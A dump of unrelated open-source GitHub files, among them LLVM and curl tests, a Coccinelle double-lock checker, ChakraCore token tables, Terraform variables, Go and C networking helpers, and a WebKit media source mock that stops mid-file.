@ RUN: llvm-mc -triple armv7-apple-darwin10 -filetype=obj -o - < %s | llvm-readobj --macho-data-in-code | FileCheck %s .text _foo: .data_region .long 10 .end_data_region .data_region jt32 .long 1 .end_data_region .data_region jt16 .short 2 .end_data_region .data_region jt8 .byte 3 .end_data_region @ CHECK: File: <stdin> @ CHECK: Format: Mach-O arm @ CHECK: Arch: arm @ CHECK: AddressSize: 32bit @ CHECK: DataInCode { @ CHECK: Data offset: 300 @ CHECK: Data size: 32 @ CHECK: Data entries [ @ CHECK: Entry { @ CHECK: Index: 0 @ CHECK: Offset: 0 @ CHECK: Length: 4 @ CHECK: Kind: 1 @ CHECK: } @ CHECK: Entry { @ CHECK: Index: 1 @ CHECK: Offset: 4 @ CHECK: Length: 4 @ CHECK: Kind: 4 @ CHECK: } @ CHECK: Entry { @ CHECK: Index: 2 @ CHECK: Offset: 8 @ CHECK: Length: 2 @ CHECK: Kind: 3 @ CHECK: } @ CHECK: Entry { @ CHECK: Index: 3 @ CHECK: Offset: 10 @ CHECK: Length: 1 @ CHECK: Kind: 2 @ CHECK: } @ CHECK: ] @ CHECK: }
{ "pile_set_name": "Github" }
export default { fileName: `/lib.es2019.string.d.ts`, // File text is copyright Microsoft Corporation and is distributed under the Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0) text: `/// <reference no-default-lib="true"/>\ninterface String{trimEnd():string;trimStart():string;trimLeft():string;trimRight():string;}` };
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 8d2d730973eb8ae4eaf627417475a972 timeCreated: 1465779652 licenseType: Pro MonoImporter: serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
// Protocol Buffers - Google's data interchange format // Copyright 2008 Google Inc. All rights reserved. // https://developers.google.com/protocol-buffers/ // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // Author: [email protected] (Pherl Liu) syntax = "proto2"; package protobuf_unittest_import; option optimize_for = LITE_RUNTIME; option java_package = "com.google.protobuf"; message PublicImportMessageLite { optional int32 e = 1; }
{ "pile_set_name": "Github" }
/// Find double locks. False positives may occur when some paths cannot /// occur at execution, due to the values of variables, and when there is /// an intervening function call that releases the lock. /// // Confidence: Moderate // Copyright: (C) 2010 Nicolas Palix, DIKU. GPLv2. // Copyright: (C) 2010 Julia Lawall, DIKU. GPLv2. // Copyright: (C) 2010 Gilles Muller, INRIA/LiP6. GPLv2. // URL: http://coccinelle.lip6.fr/ // Comments: // Options: --no-includes --include-headers virtual org virtual report @locked@ position p1; expression E1; position p; @@ ( mutex_lock@p1 | mutex_trylock@p1 | spin_lock@p1 | spin_trylock@p1 | read_lock@p1 | read_trylock@p1 | write_lock@p1 | write_trylock@p1 ) (E1@p,...); @balanced@ position p1 != locked.p1; position locked.p; identifier lock,unlock; expression x <= locked.E1; expression E,locked.E1; expression E2; @@ if (E) { <+... when != E1 lock(E1@p,...) ...+> } ... when != E1 when != \(x = E2\|&x\) when forall if (E) { <+... when != E1 unlock@p1(E1,...) ...+> } @r depends on !balanced exists@ expression x <= locked.E1; expression locked.E1; expression E2; identifier lock; position locked.p,p1,p2; @@ lock@p1 (E1@p,...); ... when != E1 when != \(x = E2\|&x\) lock@p2 (E1,...); @script:python depends on org@ p1 << r.p1; p2 << r.p2; lock << r.lock; @@ cocci.print_main(lock,p1) cocci.print_secs("second lock",p2) @script:python depends on report@ p1 << r.p1; p2 << r.p2; lock << r.lock; @@ msg = "second lock on line %s" % (p2[0].line) coccilib.report.print_report(p1[0],msg)
{ "pile_set_name": "Github" }
terraform { required_version = "~> 0.12.0" backend "s3" {} } provider "aws" { version = "~> 2.17" assume_role { role_arn = var.aws_assume_role_arn } } variable "aws_assume_role_arn" { type = string } variable "namespace" { type = string description = "Namespace (e.g. `eg` or `cp`)" } variable "stage" { type = string description = "Stage (e.g. `prod`, `dev`, `staging`)" } variable "dns_zone_name" { type = string default = "" description = "The DNS domain under which to put entries for the database. Usually the same as the cluster name, e.g. us-west-2.prod.cpco.io" } variable "chamber_service" { type = string default = "grafana" description = "`chamber` service name. See [chamber usage](https://github.com/segmentio/chamber#usage) for more details" } variable "chamber_parameter_name_pattern" { type = string default = "/%s/%s" description = "Format string for creating SSM parameter name used to store chamber parameters. The default is usually best." } variable "chamber_kms_key_id" { type = string default = "alias/aws/ssm" description = "KMS key ID, ARN, or alias to use for encrypting SSM secrets" } variable "vpc_id" { type = string description = "The ID of the VPC to create the resources in, or SSM parameter key for it" } variable "vpc_subnet_ids" { type = string description = "Comma separated string list of AWS Subnet IDs in which to place the database, or SSM parameter key for it" }
{ "pile_set_name": "Github" }
/* Localized versions of Info.plist keys */ CFBundleName = "X11"; CFBundleGetInfoString = "X11 version 2.0, Copyright 2007 Apple Inc.";
{ "pile_set_name": "Github" }
<testcase> <info> <keywords> SMTP VRFY </keywords> </info> # # Server-side <reply> <data> 252 Send some mail and I'll try my best </data> </reply> # # Client-side <client> <server> smtp </server> <name> SMTP external VRFY </name> <command> smtp://%HOSTIP:%SMTPPORT/925 --mail-rcpt [email protected] </command> </client> # # Verify data after the test has been "shot" <verify> <protocol> EHLO 925 VRFY [email protected] QUIT </protocol> </verify> </testcase>
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------------------------------- // Copyright (C) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. //------------------------------------------------------------------------------------------------------- #ifndef KEYWORD #define KEYWORD(tk,f,prec2,nop2,prec1,nop1,name) #endif //!KEYWORD #ifndef S_KEYWORD #define S_KEYWORD(name,f,lab) #endif //!S_KEYWORD // token reserved word? (see fidXXX values in enum, in hash.h) // binary operator precedence // binary operator // unary operator precedence // unary operator // name KEYWORD(tkABSTRACT ,0, No, knopNone , No, knopNone , abstract) KEYWORD(tkASSERT ,0, No, knopNone , No, knopNone , assert) KEYWORD(tkAWAIT ,1, No, knopNone ,Uni, knopAwait , await) KEYWORD(tkBOOLEAN ,0, No, knopNone , No, knopNone , boolean) KEYWORD(tkBREAK ,1, No, knopNone , No, knopNone , break) KEYWORD(tkBYTE ,0, No, knopNone , No, knopNone , byte) KEYWORD(tkCASE ,1, No, knopNone , No, knopNone , case) KEYWORD(tkCATCH ,1, No, knopNone , No, knopNone , catch) KEYWORD(tkCHAR ,0, No, knopNone , No, knopNone , char) KEYWORD(tkCONTINUE ,1, No, knopNone , No, knopNone , continue) KEYWORD(tkDEBUGGER ,1, No, knopNone , No, knopNone , debugger) KEYWORD(tkDECIMAL ,0, No, knopNone , No, knopNone , decimal) KEYWORD(tkDEFAULT ,1, No, knopNone , No, knopNone , default) KEYWORD(tkDELETE ,1, No, knopNone ,Uni, knopDelete , delete) KEYWORD(tkDO ,1, No, knopNone , No, knopNone , do) KEYWORD(tkDOUBLE ,0, No, knopNone , No, knopNone , double) KEYWORD(tkELSE ,1, No, knopNone , No, knopNone , else) KEYWORD(tkENSURE ,0, No, knopNone , No, knopNone , ensure) KEYWORD(tkEVENT ,0, No, knopNone , No, knopNone , event) KEYWORD(tkFALSE ,1, No, knopNone , No, knopNone , false) KEYWORD(tkFINAL ,0, No, knopNone , No, knopNone , final) KEYWORD(tkFINALLY ,1, No, knopNone , No, knopNone , finally) KEYWORD(tkFLOAT ,0, No, knopNone , No, knopNone , float) KEYWORD(tkFOR ,1, No, knopNone , No, knopNone , for) KEYWORD(tkFUNCTION ,1, No, knopNone , No, knopNone , function) KEYWORD(tkGET ,0, No, knopNone , No, knopNone , get) KEYWORD(tkGOTO ,0, No, knopNone , No, knopNone , goto) KEYWORD(tkIF ,1, No, knopNone , No, knopNone , if) KEYWORD(tkIN ,1, Cmp, knopIn , No, knopNone , in) KEYWORD(tkINSTANCEOF ,1, Cmp,knopInstOf , No, knopNone , instanceof) KEYWORD(tkINT ,0, No, knopNone , No, knopNone , int) KEYWORD(tkINTERNAL ,0, No, knopNone , No, knopNone , internal) KEYWORD(tkINVARIANT ,0, No, knopNone , No, knopNone , invariant) KEYWORD(tkLONG ,0, No, knopNone , No, knopNone , long) KEYWORD(tkNAMESPACE ,0, No, knopNone , No, knopNone , namespace) KEYWORD(tkNATIVE ,0, No, knopNone , No, knopNone , native) KEYWORD(tkNEW ,1, No, knopNone , No, knopNone , new) KEYWORD(tkNULL ,1, No, knopNone , No, knopNone , null) KEYWORD(tkREQUIRE ,0, No, knopNone , No, knopNone , require) KEYWORD(tkRETURN ,1, No, knopNone , No, knopNone , return) KEYWORD(tkSBYTE ,0, No, knopNone , No, knopNone , sbyte) KEYWORD(tkSET ,0, No, knopNone , No, knopNone , set) KEYWORD(tkSHORT ,0, No, knopNone , No, knopNone , short) KEYWORD(tkSWITCH ,1, No, knopNone , No, knopNone , switch) KEYWORD(tkSYNCHRONIZED,0, No, knopNone , No, knopNone , synchronized) KEYWORD(tkTHIS ,1, No, knopNone , No, knopNone , this) KEYWORD(tkTHROW ,1, No, knopNone , No, knopNone , throw) KEYWORD(tkTHROWS ,0, No, knopNone , No, knopNone , throws) KEYWORD(tkTRANSIENT ,0, No, knopNone , No, knopNone , transient) KEYWORD(tkTRUE ,1, No, knopNone , No, knopNone , true) KEYWORD(tkTRY ,1, No, knopNone , No, knopNone , try) KEYWORD(tkTYPEOF ,1, No, knopNone ,Uni, knopTypeof , typeof) KEYWORD(tkUINT ,0, No, knopNone , No, knopNone , uint) KEYWORD(tkULONG ,0, No, knopNone , No, knopNone , ulong) KEYWORD(tkUSE ,0, No, knopNone , No, knopNone , use) KEYWORD(tkUSHORT ,0, No, knopNone , No, knopNone , ushort) KEYWORD(tkVAR ,1, No, knopNone , No, knopNone , var) KEYWORD(tkVOID ,1, No, knopNone ,Uni, knopVoid , void) KEYWORD(tkVOLATILE ,0, No, knopNone , No, knopNone , volatile) KEYWORD(tkWHILE ,1, No, knopNone , No, knopNone , while) KEYWORD(tkWITH ,1, No, knopNone , No, knopNone , with) // Future reserved words that become keywords in ES6 KEYWORD(tkCLASS ,1, No, knopNone , No, knopNone , class) KEYWORD(tkCONST ,1, No, knopNone , No, knopNone , const) KEYWORD(tkEXPORT ,1, No, knopNone , No, knopNone , export) KEYWORD(tkEXTENDS ,1, No, knopNone , No, knopNone , extends) KEYWORD(tkIMPORT ,1, No, knopNone , No, knopNone , import) KEYWORD(tkSUPER ,1, No, knopNone , No, knopNone , super) // Note: yield is still treated as an identifier in non-strict, non-generator functions // and is special cased in jsscan.js when generating kwd-swtch.h // Note: yield is a weird operator in that it has assignment expression level precedence // but looks like a unary operator KEYWORD(tkYIELD ,1, No, knopNone ,Asg, knopYield , yield) // Future reserved words in strict and non-strict modes KEYWORD(tkENUM ,1, No, knopNone , No, knopNone , enum) // Additional future reserved words in strict mode KEYWORD(tkIMPLEMENTS ,2, No, knopNone , No, knopNone , implements) KEYWORD(tkINTERFACE ,2, No, knopNone , No, knopNone , interface) KEYWORD(tkLET ,2, No, knopNone , No, knopNone , let) KEYWORD(tkPACKAGE ,2, No, knopNone , No, knopNone , package) KEYWORD(tkPRIVATE ,2, No, knopNone , No, knopNone , private) KEYWORD(tkPROTECTED ,2, No, knopNone , No, knopNone , protected) KEYWORD(tkPUBLIC ,2, No, knopNone , No, knopNone , public) KEYWORD(tkSTATIC ,2, No, knopNone , No, knopNone , static) S_KEYWORD(LEval ,3, eval) S_KEYWORD(LArguments ,3, arguments) S_KEYWORD(LTarget ,3, target) #undef KEYWORD #ifndef TOK_DCL #define TOK_DCL(tk,prec2,nop2,prec1,nop1) #endif //!TOK_DCL // The identifier token must follow the last identifier keyword TOK_DCL(tkID , No, knopNone , No, knopNone) // Non-operator non-identifier tokens TOK_DCL(tkSColon , No, knopNone , No, knopNone ) // ; TOK_DCL(tkRParen , No, knopNone , No, knopNone ) // ) TOK_DCL(tkRBrack , No, knopNone , No, knopNone ) // ] TOK_DCL(tkLCurly , No, knopNone , No, knopNone ) // { TOK_DCL(tkRCurly , No, knopNone , No, knopNone ) // } // Operator non-identifier tokens TOK_DCL(tkComma ,Cma, knopComma , No, knopNone ) // , TOK_DCL(tkDArrow ,Asg, knopFncDecl, No, knopNone ) // => TOK_DCL(tkAsg ,Asg, knopAsg , No, knopNone ) // = TOK_DCL(tkAsgAdd ,Asg, knopAsgAdd , No, knopNone ) // += TOK_DCL(tkAsgSub ,Asg, knopAsgSub , No, knopNone ) // -= TOK_DCL(tkAsgMul ,Asg, knopAsgMul , No, knopNone ) // *= TOK_DCL(tkAsgDiv ,Asg, knopAsgDiv , No, knopNone ) // /= TOK_DCL(tkAsgExpo ,Asg, knopAsgExpo, No, knopNone ) // **= TOK_DCL(tkAsgMod ,Asg, knopAsgMod , No, knopNone ) // %= TOK_DCL(tkAsgAnd ,Asg, knopAsgAnd , No, knopNone ) // &= TOK_DCL(tkAsgXor ,Asg, knopAsgXor , No, knopNone ) // ^= TOK_DCL(tkAsgOr ,Asg, knopAsgOr , No, knopNone ) // |= TOK_DCL(tkAsgLsh ,Asg, knopAsgLsh , No, knopNone ) // <<= TOK_DCL(tkAsgRsh ,Asg, knopAsgRsh , No, knopNone ) // >>= TOK_DCL(tkAsgRs2 ,Asg, knopAsgRs2 , No, knopNone ) // >>>= TOK_DCL(tkQMark ,Que, knopQmark , No, knopNone ) // ? TOK_DCL(tkColon , No, knopNone , No, knopNone ) // : TOK_DCL(tkLogOr ,Lor, knopLogOr , No, knopNone ) // || TOK_DCL(tkLogAnd ,Lan, knopLogAnd , No, knopNone ) // && TOK_DCL(tkOr ,Bor, knopOr , No, knopNone ) // | TOK_DCL(tkXor ,Xor, knopXor , No, knopNone ) // ^ TOK_DCL(tkAnd ,Ban, knopAnd , No, knopNone ) // & TOK_DCL(tkEQ ,Equ, knopEq , No, knopNone ) // == TOK_DCL(tkNE ,Equ, knopNe , No, knopNone ) // != TOK_DCL(tkEqv ,Equ, knopEqv , No, knopNone ) // === TOK_DCL(tkNEqv ,Equ, knopNEqv , No, knopNone ) // !== TOK_DCL(tkLT ,Cmp, knopLt , No, knopNone ) // < TOK_DCL(tkLE ,Cmp, knopLe , No, knopNone ) // <= TOK_DCL(tkGT ,Cmp, knopGt , No, knopNone ) // > TOK_DCL(tkGE ,Cmp, knopGe , No, knopNone ) // >= TOK_DCL(tkLsh ,Shf, knopLsh , No, knopNone ) // << TOK_DCL(tkRsh ,Shf, knopRsh , No, knopNone ) // >> TOK_DCL(tkRs2 ,Shf, knopRs2 , No, knopNone ) // >>> TOK_DCL(tkAdd ,Add, knopAdd ,Uni, knopPos ) // + TOK_DCL(tkSub ,Add, knopSub ,Uni, knopNeg ) // - TOK_DCL(tkExpo ,Expo, knopExpo , No, knopNone ) // ** TOK_DCL(tkStar ,Mul, knopMul , No, knopNone ) // * TOK_DCL(tkDiv ,Mul, knopDiv , No, knopNone ) // / TOK_DCL(tkPct ,Mul, knopMod , No, knopNone ) // % TOK_DCL(tkTilde , No, knopNone ,Uni, knopNot ) // ~ TOK_DCL(tkBang , No, knopNone ,Uni, knopLogNot ) // ! TOK_DCL(tkInc , No, knopNone ,Uni, knopIncPre ) // ++ TOK_DCL(tkDec , No, knopNone ,Uni, knopDecPre ) // -- TOK_DCL(tkEllipsis , No, knopNone ,Spr, knopEllipsis ) // ... TOK_DCL(tkLParen , No, knopNone , No, knopNone ) // ( TOK_DCL(tkLBrack , No, knopNone , No, knopNone ) // [ TOK_DCL(tkDot , No, knopNone , No, knopNone ) // . // String template tokens TOK_DCL(tkStrTmplBasic , No, knopNone , No, knopNone ) // `...` TOK_DCL(tkStrTmplBegin , No, knopNone , No, knopNone ) // `...${ TOK_DCL(tkStrTmplMid , No, knopNone , No, knopNone ) // }...${ Note: tkStrTmplMid and tkStrTmplEnd tokens do not actually contain the opening '}' character. TOK_DCL(tkStrTmplEnd , No, knopNone , No, knopNone ) // }...` Since the scanner can't disambiguate a tkRCurly which is part of the expression, literal, or string template syntax // we check to make sure the token after parsing the expression is a tkRCurly and put the scanner into a string template // scanning mode which will scan the string literal and search for the closing '${' or '`'. TOK_DCL(tkComment , No, knopNone, No, knopNone ) // Comment for syntax coloring TOK_DCL(tkScanError , No, knopNone, No, knopNone ) // Error in syntax coloring #undef TOK_DCL
{ "pile_set_name": "Github" }
{ "asset": { "uuid": "2783a9ff-d6f1-5c9e-bbab-3b74be91adb1", "name": "RopDAI", "decimal": 18, "ticker": "RopDAI", "networkId": "Ropsten", "contractAddress": "0xad6d458402f60fd3bd25163575031acdce07538d", "type": "erc20", "isCustom": true }, "baseAsset": { "uuid": "77de68da-ecd8-53ba-bbb5-8edb1c8e14d7", "ticker": "RopstenETH", "name": "Ropsten", "decimal": 18, "networkId": "Ropsten", "type": "base", "isCustom": false }, "hash": "0x13ca764cb3f852dc6b95118e32d5ff589fb9fccd987d0f7818d6baf3b1ae1a26", "from": "0xb2bb2b958AFa2e96dab3f3Ce7162b87daEa39017", "receiverAddress": "0xb2bb2b958AFa2e96dab3f3Ce7162b87daEa39017", "amount": "0.01", "to": "0xad6d458402f60fd3bd25163575031acdce07538d", "nonce": "7", "gasLimit": { "_hex": "0x7d3c" }, "gasPrice": { "_hex": "0x012a05f200" }, "data": "0xa9059cbb0000000000000000000000004d1f9d958afa2e96dab3f3ce7162b87daea39017000000000000000000000000000000000000000000000000002386f26fc10000", "value": { "_hex": "0x0" }, "status": "SUCCESS", "txType": "STANDARD", "blockNumber": 7990974, "timestamp": 1590734231, "gasUsed": { "_hex": "0x7d3c" }, "confirmations": 1 }
{ "pile_set_name": "Github" }
/*************************************************************************** * _ _ ____ _ * Project ___| | | | _ \| | * / __| | | | |_) | | * | (__| |_| | _ <| |___ * \___|\___/|_| \_\_____| * * Copyright (C) 1998 - 2016, Daniel Stenberg, <[email protected]>, et al. * * This software is licensed as described in the file COPYING, which * you should have received as part of this distribution. The terms * are also available at https://curl.haxx.se/docs/copyright.html. * * You may opt to use, copy, modify, merge, publish, distribute and/or sell * copies of the Software, and permit persons to whom the Software is * furnished to do so, under the terms of the COPYING file. * * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY * KIND, either express or implied. * ***************************************************************************/ #include "tool_setup.h" #ifdef HAVE_PWD_H # include <pwd.h> #endif #include "tool_homedir.h" #include "memdebug.h" /* keep this as LAST include */ static char *GetEnv(const char *variable, char do_expand) { char *env = NULL; #ifdef WIN32 char buf1[1024], buf2[1024]; DWORD rc; /* Don't use getenv(); it doesn't find variable added after program was * started. Don't accept truncated results (i.e. rc >= sizeof(buf1)). */ rc = GetEnvironmentVariableA(variable, buf1, sizeof(buf1)); if(rc > 0 && rc < sizeof(buf1)) { env = buf1; variable = buf1; } if(do_expand && strchr(variable, '%')) { /* buf2 == variable if not expanded */ rc = ExpandEnvironmentStringsA(variable, buf2, sizeof(buf2)); if(rc > 0 && rc < sizeof(buf2) && !strchr(buf2, '%')) /* no vars still unexpanded */ env = buf2; } #else (void)do_expand; /* no length control */ env = getenv(variable); #endif return (env && env[0]) ? strdup(env) : NULL; } /* return the home directory of the current user as an allocated string */ char *homedir(void) { char *home; home = GetEnv("CURL_HOME", FALSE); if(home) return home; home = GetEnv("HOME", FALSE); if(home) return home; #if defined(HAVE_GETPWUID) && defined(HAVE_GETEUID) { struct passwd *pw = getpwuid(geteuid()); if(pw) { home = pw->pw_dir; if(home && home[0]) home = strdup(home); else home = NULL; } } #endif /* PWD-stuff */ #ifdef WIN32 home = GetEnv("APPDATA", TRUE); if(!home) home = GetEnv("%USERPROFILE%\\Application Data", TRUE); /* Normally only on Win-2K/XP */ #endif /* WIN32 */ return home; }
{ "pile_set_name": "Github" }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package http2 import ( "net/http" "strings" "mosn.io/mosn/pkg/protocol" "mosn.io/mosn/pkg/types" ) type HeaderMap struct { H http.Header } type ReqHeader struct { *HeaderMap Req *http.Request } type RspHeader struct { *HeaderMap Rsp *http.Response } func NewHeaderMap(header http.Header) *HeaderMap { h := new(HeaderMap) h.H = header return h } func NewReqHeader(req *http.Request) *ReqHeader { h := new(ReqHeader) h.Req = req h.HeaderMap = NewHeaderMap(h.Req.Header) return h } func NewRspHeader(rsp *http.Response) *RspHeader { h := new(RspHeader) h.Rsp = rsp h.HeaderMap = NewHeaderMap(h.Rsp.Header) return h } // Get value of key func (h *HeaderMap) Get(key string) (value string, ok bool) { value = h.H.Get(key) if value == "" { return value, false } return value, true } // Add value for given key. // Multiple headers with the same key may be added with this function. // Use Set for setting a single header for the given key. func (h *HeaderMap) Set(key string, value string) { h.H.Set(key, value) } // Set key-value pair in header map, the previous pair will be replaced if exists func (h *HeaderMap) Add(key string, value string) { h.H.Add(key, value) } // Del delete pair of specified key func (h *HeaderMap) Del(key string) { h.H.Del(key) } func (h *HeaderMap) Clone() types.HeaderMap { header := h.H h2 := make(http.Header, len(header)) for k, vv := range header { vv2 := make([]string, len(vv)) copy(vv2, vv) h2[k] = vv2 } return NewHeaderMap(h2) } func (h *ReqHeader) Clone() types.HeaderMap { h2 := new(ReqHeader) h2.HeaderMap = h.HeaderMap.Clone().(*HeaderMap) h2.Req = new(http.Request) *h2.Req = *h.Req h2.Req.Header = h2.HeaderMap.H return h2 } func (h *ReqHeader) Get(key string) (string, bool) { if len(key) > 0 && key[0] == ':' { switch key { case ":authority": return h.Req.Host, true case ":path": return h.Req.RequestURI, true case ":method": return h.Req.Method, true default: return "", false } } return h.HeaderMap.Get(key) } func (h *RspHeader) Clone() types.HeaderMap { h2 := new(RspHeader) h2.HeaderMap = h.HeaderMap.Clone().(*HeaderMap) h2.Rsp = new(http.Response) *h2.Rsp = *h.Rsp h2.Rsp.Header = h2.HeaderMap.H return h2 } // Range calls f sequentially for each key and value present in the map. // If f returns false, range stops the iteration. func (h HeaderMap) Range(f func(key, value string) bool) { for k, v := range h.H { // stop if f return false if !f(k, v[0]) { break } } } func (h HeaderMap) ByteSize() uint64 { var size uint64 for k, v := range h.H { size += uint64(len(k) + len(v[0])) } return size } func EncodeHeader(header types.HeaderMap) http.Header { h := http.Header((make(map[string][]string))) header.Range(func(k, v string) bool { h.Add(k, v) return true }) return h } func DecodeHeader(header types.HeaderMap) types.HeaderMap { var in http.Header switch h := header.(type) { case *ReqHeader: in = h.H case *RspHeader: in = h.H case *HeaderMap: in = h.H default: return nil } out := make(map[string]string) for k, v := range in { out[strings.ToLower(k)] = strings.Join(v, ",") } return protocol.CommonHeader(out) }
{ "pile_set_name": "Github" }
// Copyright 2017 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build linux,!s390x,!386 package socket import ( "syscall" "unsafe" ) func probeProtocolStack() int { var p uintptr return int(unsafe.Sizeof(p)) } func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { n, _, errno := syscall.Syscall6(sysRECVMMSG, s, uintptr(unsafe.Pointer(&hs[0])), uintptr(len(hs)), uintptr(flags), 0, 0) return int(n), errnoErr(errno) } func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { n, _, errno := syscall.Syscall6(sysSENDMMSG, s, uintptr(unsafe.Pointer(&hs[0])), uintptr(len(hs)), uintptr(flags), 0, 0) return int(n), errnoErr(errno) }
{ "pile_set_name": "Github" }
/*! * Nodeunit * Copyright (c) 2010 Caolan McMahon * MIT Licensed */ /** * Module dependencies */ var nodeunit = require('../nodeunit'), utils = require('../utils'), fs = require('fs'), path = require('path'), AssertionError = require('assert').AssertionError; /** * Reporter info string */ exports.info = "Skip passed tests output"; /** * Run all tests within each module, reporting the results to the command-line. * * @param {Array} files * @api public */ exports.run = function (files, options, callback) { if (!options) { // load default options var content = fs.readFileSync( __dirname + '/../../bin/nodeunit.json', 'utf8' ); options = JSON.parse(content); } var error = function (str) { return options.error_prefix + str + options.error_suffix; }; var ok = function (str) { return options.ok_prefix + str + options.ok_suffix; }; var bold = function (str) { return options.bold_prefix + str + options.bold_suffix; }; var assertion_message = function (str) { return options.assertion_prefix + str + options.assertion_suffix; }; var start = new Date().getTime(); var paths = files.map(function (p) { return path.join(process.cwd(), p); }); nodeunit.runFiles(paths, { testspec: options.testspec, testFullSpec: options.testFullSpec, moduleStart: function (name) { console.log('\n' + bold(name)); }, testDone: function (name, assertions) { if (assertions.failures()) { console.log(error('✖ ' + name) + '\n'); assertions.forEach(function (a) { if (a.failed()) { a = utils.betterErrors(a); if (a.error instanceof AssertionError && a.message) { console.log( 'Assertion Message: ' + assertion_message(a.message) ); } console.log(a.error.stack + '\n'); } }); } }, moduleDone: function (name, assertions) { if (!assertions.failures()) { console.log('✔ all tests passed'); } else { console.log(error('✖ some tests failed')); } }, done: function (assertions) { var end = new Date().getTime(); var duration = end - start; if (assertions.failures()) { console.log( '\n' + bold(error('FAILURES: ')) + assertions.failures() + '/' + assertions.length + ' assertions failed (' + assertions.duration + 'ms)' ); } else { console.log( '\n' + bold(ok('OK: ')) + assertions.length + ' assertions (' + assertions.duration + 'ms)' ); } if (callback) callback(assertions.failures() ? new Error('We have got test failures.') : undefined); } }); };
{ "pile_set_name": "Github" }
How to analyse a server's log files Intro to `sed` Using `lynx` to convert HTML to text Image manipulation using `convert` Wrap text with `fold`
{ "pile_set_name": "Github" }
/* * Copyright (C) 2013-2014 Apple Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY * OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "config.h" #include "MockSourceBufferPrivate.h" #if ENABLE(MEDIA_SOURCE) #include "MediaDescription.h" #include "MediaPlayer.h" #include "MediaSample.h" #include "MockBox.h" #include "MockMediaPlayerMediaSource.h" #include "MockMediaSourcePrivate.h" #include "MockTracks.h" #include "SourceBufferPrivateClient.h" #include <map> #include <runtime/ArrayBuffer.h> #include <wtf/PrintStream.h> namespace WebCore { class MockMediaSample final : public MediaSample { public: static RefPtr<MockMediaSample> create(const MockSampleBox& box) { return adoptRef(new MockMediaSample(box)); } virtual ~MockMediaSample() { } private: MockMediaSample(const MockSampleBox& box) : m_box(box) , m_id(String::format("%d", box.trackID())) { } MediaTime presentationTime() const override { return m_box.presentationTimestamp(); } MediaTime decodeTime() const override { return m_box.decodeTimestamp(); } MediaTime duration() const override { return m_box.duration(); } AtomicString trackID() const override { return m_id; } size_t sizeInBytes() const override { return sizeof(m_box); } SampleFlags flags() const override; PlatformSample platformSample() override; FloatSize presentationSize() const override { return FloatSize(); } void dump(PrintStream&) const override; void offsetTimestampsBy(const MediaTime& offset) override { m_box.offsetTimestampsBy(offset); } void setTimestamps(const MediaTime& presentationTimestamp, const MediaTime& decodeTimestamp) override { m_box.setTimestamps(presentationTimestamp, decodeTimestamp); } unsigned generation() const { return m_box.generation(); } MockSampleBox m_box; AtomicString m_id; }; MediaSample::SampleFlags 